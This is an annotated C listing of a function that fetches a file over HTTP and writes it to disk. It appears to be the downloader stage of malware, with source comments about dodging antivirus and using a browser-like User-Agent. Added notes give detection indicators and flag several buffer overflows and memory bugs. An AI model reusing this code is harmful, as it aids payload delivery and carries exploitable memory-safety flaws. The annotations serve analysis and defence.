- /* Downloads a file from `url` over plain HTTP and writes it to `path_to_write`.
   *
   * Visible behaviour: the host and path are split out of `url` (the text after
   * "://" up to the first '/'), a TCP connection is opened to port 80 through
   * socket_init_and_connect(), an HTTP/1.0 GET is sent, and the response is read
   * one byte at a time until recv() returns <= 0. Everything after the first
   * "\r\n\r\n" is treated as the file body, and `filesize` bytes of it are
   * written with fwrite(). Nothing in this function launches the file; any
   * execution step implied by the name would be outside this listing.
   *
   * Returns 1 after the write, -1 on the failure paths below.
   *
   * Defender notes: the request is recognisable on the wire (HTTP/1.0 GET on
   * port 80, upper-case "HOST:" header, "Cache-Control: max-age=0", one fixed
   * User-Agent string), and the write of the response body to a caller-chosen
   * path is visible to file-creation telemetry.
   *
   * NOTE(review): several copies and formats into the fixed 512/1024-byte
   * buffers are unbounded and allocation results are not checked, so long or
   * malformed URLs and responses can corrupt memory.
   */
- int download_and_execute(const char * path_to_write, const char * url, long filesize) {
- char host[512];
- char host_path[512];
- char* t = strstr(url, "://");
- strcpy(host, t + 3); // NOTE(review): t is not NULL-checked; copy into host[512] has no length limit
- char* tt = strstr(host, "/");
- if (!tt) return -1; // a URL with no '/' after the host is rejected
- else {
- strcpy(host_path, tt); // request path, including the leading '/'
- }
- strcpy(tt, "\x00"); // writes a NUL at the first '/', leaving only the host name in host
- #ifdef _DEBUG
- printf("HOST:%s\n", host);
- printf("PATH:%s\n", host_path);
- printf("Init...\n");
- #endif
- int __port = 80; // fixed port: the transfer is always plain HTTP, whatever scheme the URL names
- printf("Phase-2\n");
- SOCKET host_server = INVALID_SOCKET;
- printf("phase-3\n");
- if (!socket_init_and_connect(&host_server, host, __port)) {
- printf("Error socket_init_and_connect\n");
- return -1;
- }
- printf("Phase-4\n");
- if (host_server == INVALID_SOCKET || host_server == NULL) {
- printf("Invalid socket..");
- return -1;
- }
- printf("Phase-5\n");
- // Form HTTP-request message.
- // use browser-like UA to have less complications
- char tmp_buff[512], http_request_buff[1024];
- sprintf(tmp_buff, "GET %s HTTP/1.0\r\n", host_path); // NOTE(review): unbounded format into tmp_buff[512]
- strcpy(http_request_buff, tmp_buff);
- sprintf(tmp_buff, "HOST: %s\r\n", host); // header name is sent in upper case, as written here
- strcat(http_request_buff, tmp_buff);
- strcat(http_request_buff, "Cache-Control: max-age=0\r\n");
- strcat(http_request_buff, "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36\r\n" ); // static User-Agent, identical on every request
- strcat(http_request_buff, "\r\n");
- printf("HTTP-REQUEST-BUFF: \n%s\n", http_request_buff);
- if (!sendall(host_server, http_request_buff, strlen(http_request_buff) * sizeof(char))) {
- printf("Error sending request\n");
- close_socket_connection(host_server);
- return -1;
- }
- size_t http_response_size = (size_t)(filesize + 512); // buffer is sized from the caller-supplied filesize plus 512 bytes for headers
- char * http_response = malloc(http_response_size); // NOTE(review): result is not checked before the memset below
- memset(http_response, 0, http_response_size);
- printf("Reading response");
- int total_recv = 0;
- while (1) {
- if (total_recv >= (int)(http_response_size) ) {
- printf("Reallocating\n");
- realloc(http_response, http_response_size + 64); // NOTE(review): return value is discarded, so http_response keeps the old pointer
- http_response_size += 512; // bookkeeping grows by 512 although 64 more bytes were requested
- }
- int r = recv(host_server, http_response+total_recv, 1, 0); // one byte per call
- total_recv += r; // r is added before it is checked, so a negative return lowers the count
- memset(http_response + total_recv, 0, 1); // keeps the buffer NUL-terminated; NOTE(review): can land one byte past the buffer when it is full
- if (r <= 0) {
- printf("Finished??..");
- break;
- }
- }
- printf("HTTP-REPONSE:\n%s\n", http_response);
- printf("Finished receiving...\n" );
- // http_response now holds the http response data by the server
- char* http_ok = strstr(http_response, "200 OK");
- if ((http_ok != NULL) && (http_response - http_ok) > 10) { // NOTE(review): http_ok is at or after http_response, so the difference is never positive and this branch is not taken; the status is effectively not validated
- free(http_response);
- close_socket_connection(host_server);
- return -1;
- }
- close_socket_connection(""); // NOTE(review): a string literal is passed here, not host_server
- char* http_header_end = strstr(http_response, "\r\n\r\n");
- if (http_header_end == NULL) {
- free(http_response);
- return -1;
- }
- char* exe_file_contents = http_header_end + 4; // first byte after the blank line that ends the headers
- // [!] Direct write to disc of a (valid) PE file might trigger AVs
- FILE* file = fopen(path_to_write, "wb");
- if (!file) {
- return -1; // http_response is not freed on this path
- }
- fwrite((void*)exe_file_contents, filesize, 1, file); // writes filesize bytes regardless of how many were actually received
- fclose(file);
- return 1; // http_response is not freed before returning
- }